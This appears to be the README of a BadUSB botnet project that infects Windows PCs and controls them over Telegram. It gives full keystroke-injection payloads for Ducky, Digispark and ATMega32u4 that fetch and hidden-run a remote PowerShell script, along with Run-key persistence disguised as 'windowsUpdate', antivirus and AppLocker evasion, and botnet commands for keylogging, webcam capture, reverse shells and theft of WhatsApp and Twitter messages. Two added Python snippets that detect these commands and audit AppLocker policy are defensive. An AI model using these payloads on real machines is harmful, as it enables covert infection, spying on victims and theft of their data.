alexfrancow / Badusb_botnet

👥😈 Infect a PC with BadUSB and establish a connection through Telegram.

badusb_botnet

😈👥 Infect a PC with BadUSB and establish a connection through Telegram.

Configuration

############
## CONFIG ##
############

$BotToken = "<BOTTOKEN>"
$ChatID = '<CHATID>'
$githubScript = '<you_fork/poc.ps1>'

To create a Telegram bot: https://core.telegram.org/bots#6-botfather

To get ChatID: https://stackoverflow.com/questions/32423837/telegram-bot-how-to-get-a-group-chat-id

Option 1: Powershell

Option 1.1: Simple

> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
> (new-object net.webclient).DownloadFile('https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1','poc.ps1')
> powershell.exe -windowstyle hidden -file poc.ps1

DELAY 3000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 750
STRING [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
DELAY 500
ENTER
STRING (new-object net.webclient).DownloadFile('https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1','poc.ps1')
DELAY 500
ENTER
STRING powershell.exe -windowstyle hidden -file poc.ps1
DELAY 500
ENTER

Link to convert to .ino: https://malduino.com/converter/

Option 1.2: Backdoor

> reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /f
> Invoke-WebRequest -Uri https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1 -OutFile C:\Users\$env:username\Documents\windowsUpdate.ps1
> reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /t REG_SZ /d "powershell.exe -windowstyle hidden -file C:\Users\$env:username\Documents\windowsUpdate.ps1"

DELAY 3000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 750
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /f
DELAY 500
ENTER
STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1 -OutFile C:\Users\$env:username\Documents\windowsUpdate.ps1
DELAY 500
ENTER
STRING reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /t REG_SZ /d "powershell.exe -windowstyle hidden -file C:\Users\$env:username\Documents\windowsUpdate.ps1"
DELAY 500
ENTER

Link to convert to .ino: https://malduino.com/converter/

Option 2: CMD

Windows PowerShell is too slow at startup, so we can use cmd to download the '.ps1' file and execute it. To download a file with cmd, there are two options: bitsadmin or certutil.exe. (Certutil is not installed by default on XP/Win2003 but is available on newer Windows versions. For XP/2003 you'll need the Admin Tool Pack for Windows Server 2003.)

Syntax

> bitsadmin /transfer myDownloadJob /download /priority normal http://downloadsrv/10mb.zip c:\10mb.zip
> certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip

Option 2.1: Simple

> certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1" "Documents/windowsUpdate.ps1"
> powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
> powershell.exe -windowstyle hidden -file "Documents/windowsUpdate.ps1"

or

> certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1" "Documents/windowsUpdate.ps1"
> powershell.exe -windowstyle hidden -executionPolicy bypass -file "Documents/windowsUpdate.ps1"

Avast detects this last option.

Option 2.2: Backdoor

> certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1" Documents\windowsUpdate.ps1
> powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
> reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /t REG_SZ /d "powershell.exe -windowstyle hidden -file C:\Users\$env:username\Documents\windowsUpdate.ps1"
> reboot (?)
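
Seen from the defender's side, the command lines in Options 1 and 2 stand out in process-creation logs. The following added example (not part of the badusb_botnet project) flags them and links a downloaded .ps1 to its later hidden launch or Run key registration; the rule names, the sample log lines and the example.invalid URL are constructed for illustration.

```python
import re

# Rules match on arguments, not the image name, so a binary invoked through a
# resolved full path (as the FOR /F trick on this page produces) still matches.
RULES = {
    "certutil_url_download": re.compile(r"[-/]urlcache\b.*[-/]f\b.*https?://"),
    "bits_url_download": re.compile(r"/transfer\b.*/download\b.*https?://"),
    "ps_hidden_window": re.compile(r"[-/]w\w*\s+hidden\b"),
    "ps_policy_relaxed": re.compile(r"[-/]e(p|x\w*)\s+(bypass|unrestricted)\b"),
    "run_key_script": re.compile(
        r"\breg(\.exe)?\s+add\b.*\\currentversion\\run\b.*\b(powershell|cmd|wscript)"),
}
PS1_NAME = re.compile(r"([\w.-]+\.ps1)\b")

def normalize(cmdline):
    """Lowercase and collapse whitespace so spacing and case do not matter."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()

def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    text = normalize(cmdline)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def staged_scripts(cmdlines):
    """Return .ps1 names fetched from a URL and later started hidden or
    registered under a Run key, in the order they were seen."""
    fetched, chained = set(), []
    for cmdline in cmdlines:
        hits = set(classify(cmdline))
        names = set(PS1_NAME.findall(normalize(cmdline)))
        if hits & {"certutil_url_download", "bits_url_download"}:
            fetched |= names
        elif hits & {"ps_hidden_window", "run_key_script"}:
            chained += sorted(n for n in names & fetched if n not in chained)
    return chained

# Constructed process-creation command lines (not real telemetry).
SAMPLE = [
    r'C:\Windows\System32\certutil.exe -urlcache -split -f "https://example.invalid/poc.ps1" "Documents/windowsUpdate.ps1"',
    "powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted",
    'powershell.exe -WindowStyle Hidden -File "Documents/windowsUpdate.ps1"',
    "certutil.exe -hashfile setup.exe SHA256",               # benign
    r"powershell.exe -File C:\Scripts\backup.ps1",           # benign
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line), "<-", line)
    print("fetched then launched:", staged_scripts(SAMPLE))
```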

Example with digispark

#define kbd_es_es
#include "DigiKeyboard.h"
void setup() {
}

void loop() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell -noe -c \". mode.com con: lines=1 cols=40\"");
//DigiKeyboard.print("cmd");
//DigiKeyboard.print("cmd /k mode con:cols=20 lines=1");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(3000);
DigiKeyboard.print("Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);
DigiKeyboard.print("S");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("(new-object net.webclient).DownloadFile('https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1','poc.ps1')");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell.exe -windowstyle hidden -file poc.ps1");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for (;;) {
/*empty*/
    }
}

Keyboard en_US to es_ES: https://github.com/ernesto-xload/DigisparkKeyboard. Decompress the archive and put everything in C:\Users\Administrador\AppData\Local\Arduino15\packages\digistump\hardware\avr\1.6.7\libraries\DigisparkKeyboard. Then, in the script, add the following line to specify the keyboard layout:

#define kbd_es_es

Example with ATMega32u4

First, we need the Keyboard.h library in es_ES. To do this, copy the Keyboard directory of this project into "C:\Program Files (x86)\Arduino\libraries".

#include <Keyboard.h>

void setup() {
  Keyboard.begin(); //Start keyboard communication
  delay(3000);
  Keyboard.press(KEY_LEFT_GUI);
  delay(500);
  Keyboard.press('r');
  Keyboard.releaseAll();
  delay(500);

  Keyboard.println("cmd");
  delay(500);
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();

  Keyboard.println("certutil.exe -urlcache -split -f \"https://raw.githubusercontent.com/alexfrancow/poc/master/poc.ps1\" \"Documents/poc.ps1\"");
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);

  Keyboard.println("powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted");
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);

  Keyboard.println("powershell.exe -windowstyle hidden -file \"Documents/poc.ps1\"");
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
}
void loop() {
}

We use \" to escape the double quotes in Arduino code.

Example with bitsadmin

Keyboard.println(" bitsadmin /transfer \"Descargando Drivers USB\" /download /priority high \"https://raw.githubusercontent.com/alexfrancow/poc/master/poc.ps1\" %TEMP%/poc.ps1 && echo Instalando Drivers: ");

Evade AVs

Obfuscating Binary Names

For Loop Value Extraction

FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a

Example:

Keyboard.println(" FOR /F \"delims=/ tokens=1\" %a IN ('where certutil')DO %a -urlcache -split -f \"https://raw.githubusercontent.com/alexfrancow/poc/master/poc.ps1\" \"Documents/poc.ps1\" ");

Bypass AppLocker

AppLocker policies are stored in HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2. You can verify the folders in which you have permission to run .ps1 scripts.
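
The same policy can be reviewed from the administrator's side. This added example (not part of the project) parses an AppLocker policy exported as XML and reports Script rules that let broad groups run scripts from user-writable paths such as the Documents folder used above; the sample policy, its rule names and the list of writable locations are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed policy in the exported AppLocker XML layout (names and Ids made up).
POLICY_XML = r"""<AppLockerPolicy Version="1">
 <RuleCollection Type="Script" EnforcementMode="Enabled">
  <FilePathRule Id="r1" Name="Windows folder" UserOrGroupSid="S-1-1-0" Action="Allow">
   <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
  </FilePathRule>
  <FilePathRule Id="r2" Name="Helpdesk scripts" UserOrGroupSid="S-1-1-0" Action="Allow">
   <Conditions><FilePathCondition Path="%OSDRIVE%\Users\*\Documents\*" /></Conditions>
  </FilePathRule>
 </RuleCollection>
</AppLockerPolicy>"""

BROAD_SIDS = {"S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users",
              "S-1-5-32-545": "Users"}
# Assumption: path patterns that reach locations a standard user can write to.
WRITABLE_EXACT = {"*", "%osdrive%\\*"}
WRITABLE_PREFIX = ("%osdrive%\\users\\", "c:\\users\\", "%removable%", "%hot%")

def covers_user_writable(path):
    """True if an allow rule for this path reaches a user-writable location."""
    p = path.lower()
    return p in WRITABLE_EXACT or p.startswith(WRITABLE_PREFIX)

def audit_script_rules(policy_xml):
    """Return (rule name, path, reason) findings for the Script collection."""
    findings, seen = [], False
    for coll in ET.fromstring(policy_xml).iter("RuleCollection"):
        if coll.get("Type") != "Script":
            continue
        seen = True
        mode = coll.get("EnforcementMode", "NotConfigured")
        if mode != "Enabled":
            findings.append(("<collection>", "", f"script rules not enforced ({mode})"))
        for rule in coll.iter("FilePathRule"):
            sid = rule.get("UserOrGroupSid")
            if rule.get("Action") != "Allow" or sid not in BROAD_SIDS:
                continue
            for cond in rule.findall("./Conditions/FilePathCondition"):
                if covers_user_writable(cond.get("Path", "")):
                    findings.append((rule.get("Name"), cond.get("Path"),
                                     f"{BROAD_SIDS[sid]} may run scripts here"))
    if not seen:
        findings.append(("<policy>", "", "no Script rule collection defined"))
    return findings

if __name__ == "__main__":
    print(*audit_script_rules(POLICY_XML), sep="\n")
```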

Telegram Options

Basic

  • /list (List all available devices)
  • /select IP command (Execute a command)
  • /stop IP (Stop remote connection)
  • /cleanAll IP (Clean all files)
  • /ipPublic IP (Geolocate IP)
  • /download IP file (Download a file from PC)

Advanced

  • /screenshot IP (Capture screen)
  • /backdoor IP (Create a persistent backdoor)
  • /webcam IP
  • /keylogger IP time in seconds
  • /nc IP IP to connect ($ip) (First you must use nc -lp 8888 -v to create a listener)
  • /stopnc IP (Stop nc.exe and erase all archives)

Ultra

  • /hackT IP (Get Twitter messages if the victim is authenticated) [Only web - W10]
  • /hackW IP (Get WhatsApp messages if the victim is authenticated) [Only Web - W10]
  • /starttwitch IP STREAM_KEY (Start a video transmission on Twitch with ffmpeg)
  • /stoptwitch IP (Stop ffmpeg.exe and erase all archives)

PoCs

🔗📺 TOUR - POC

🔗📺 TWITCH STREAMING - POC

🔗📺 KEYLOGGER - POC

🔗📺 DIGISPARK - POC

{TODO}
  • Change all Invoke-WebRequest to cURL. (Invoke-WebRequest requires Internet Explorer to be set up.)
  • Create an ID for each connected user.
  • Hack WhatsApp on .exe.
  • ✔️ Fix Twitch streaming.
  • ✔️ Fix keylogger.
  • Add monitor selector to screenshot.
  • Add Windows version detector in HackTwitterW10() and hackWhatsAPPW10() functions.
  • Add hackGmail().
  • ✔️ Verbose via Telegram messages.
  • ✔️ Netcat reverse connection.